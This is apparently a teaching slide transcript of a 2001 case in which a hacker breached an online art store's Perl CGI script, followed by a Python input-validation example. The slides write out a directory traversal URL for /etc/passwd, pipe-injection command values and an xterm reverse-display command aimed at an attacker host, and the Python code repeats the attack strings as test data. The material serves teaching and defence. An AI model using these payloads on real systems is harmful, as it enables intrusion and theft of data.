Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database.

Presentation transcript:

Hacking Case Study Sungchul Hong

Acme Art, Inc. Case, October 31, 2001. A hacker stole credit card numbers from the online store’s database. A firewall was installed; only ports 80 and 443 were open. The computer forensics team found the following:

Server Environment: Apache on a Linux system; a Perl CGI script was used.

The hacker is looking around the web pages and clicking images.

Hacker's Move: art.com/index.cgi?page=index.cgi
Log entry: [31/Oct/2001:03:03: ] “GET /cgi-bin/ HTTP/1.0”
The hacker sees that index.cgi accepts a filename as a parameter and displays the contents of that file. He passes index.cgi itself as the parameter to display its own source code.

Vulnerability Revealed: *** No parameter type checking *** The source of the index.cgi page is revealed.

Vulnerability: The hacker guesses the system file name and its path, then opens it.

Error Message: the error message reveals the programming secret (implementation details of the script).

Hacker’s Next Move: art.com/index.cgi?page=/../../../../../../../../../etc/passwd (writes the passwd file to the screen)

Message: The entire contents of the /etc/passwd file are returned and displayed in the browser.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
…

Next Move: The hacker uses the pipe character in the file parameter, followed by commands of his choice. Now, instead of a file being opened, Perl opens a file handle that receives the standard output generated by the commands specified in the file name parameter.

Code:
ls -la /      /* reveals files in the root directory */
id            /* shows the user and group id that index.cgi runs as */
which xterm   /* path to the xterm binary */
(use hex ‘0A’, a line feed, to separate the commands)
Now hackers can run any commands on the Web server under the security privileges of the “nobody” account.

Use xterm to gain interactive shell access to the Web server:
xterm -display <attacker-host>:0.0 &
(The xterm command launches an xterm window back to the attacker’s display on :0.0.)

Hacker’s View:
bash$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
bash$ pwd
/usr/local/apache/htdocs
bash$

Note: The attacker used only port 80 (the HTTP port), so the firewall couldn’t help.
Lesson:
– All inputs must be checked.
– Do not show unnecessary information.
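As an added example (not the Acme Art script or anything from the original slides), the input check the lesson calls for: a page parameter is accepted only if it matches a strict allow-list pattern and resolves inside the document root, and a refused request gets a bare 404 rather than an error message. The document root, the gallery.html file and the attack inputs are constructed test data; in the Perl script of the case the same allow-list plus a three-argument open (open(my $fh, '<', $path)) would be the equivalent fix, since that form never treats a leading or trailing '|' as a pipe.

```python
import os
import re
import tempfile

# Constructed document root standing in for /usr/local/apache/htdocs in the case.
DOC_ROOT = os.path.realpath(tempfile.mkdtemp(prefix="acme-htdocs-"))
with open(os.path.join(DOC_ROOT, "gallery.html"), "w") as fh:
    fh.write("<h1>Acme Art gallery</h1>\n")

# Allow-list: a bare file name of letters, digits, '_' or '-', ending in .html.
# This alone excludes '/', '..', '|' and the 0x0A line feed used in the case.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.html")


def resolve_page(param: str):
    """Return the absolute path for a 'page' parameter, or None if it is rejected.

    Two independent checks, so neither has to be perfect on its own:
    1. fullmatch against the allow-list pattern (fullmatch, not match, so that a
       trailing newline cannot sneak past a '$' anchor);
    2. the resolved real path must still lie inside DOC_ROOT, which also covers
       symlinks and any later loosening of the pattern.
    """
    if not PAGE_NAME.fullmatch(param):
        return None
    real = os.path.realpath(os.path.join(DOC_ROOT, param))
    if os.path.commonpath([real, DOC_ROOT]) != DOC_ROOT:
        return None
    if not os.path.isfile(real):
        return None
    return real


def serve_page(param: str) -> str:
    """Body the CGI would send back for a 'page' parameter."""
    path = resolve_page(param)
    if path is None:
        # Second lesson of the case: no path, no errno, no script internals.
        return "404 Not Found"
    with open(path, "r") as fh:
        return fh.read()


# The inputs seen in the case, reconstructed here as constructed test data.
ATTACK_INPUTS = [
    "index.cgi",                                  # read the script's own source
    "/../../../../../../../../../etc/passwd",     # directory traversal
    "|ls -la /",                                  # pipe into a shell command
    "gallery.html\n",                             # hex 0A line feed appended
]
```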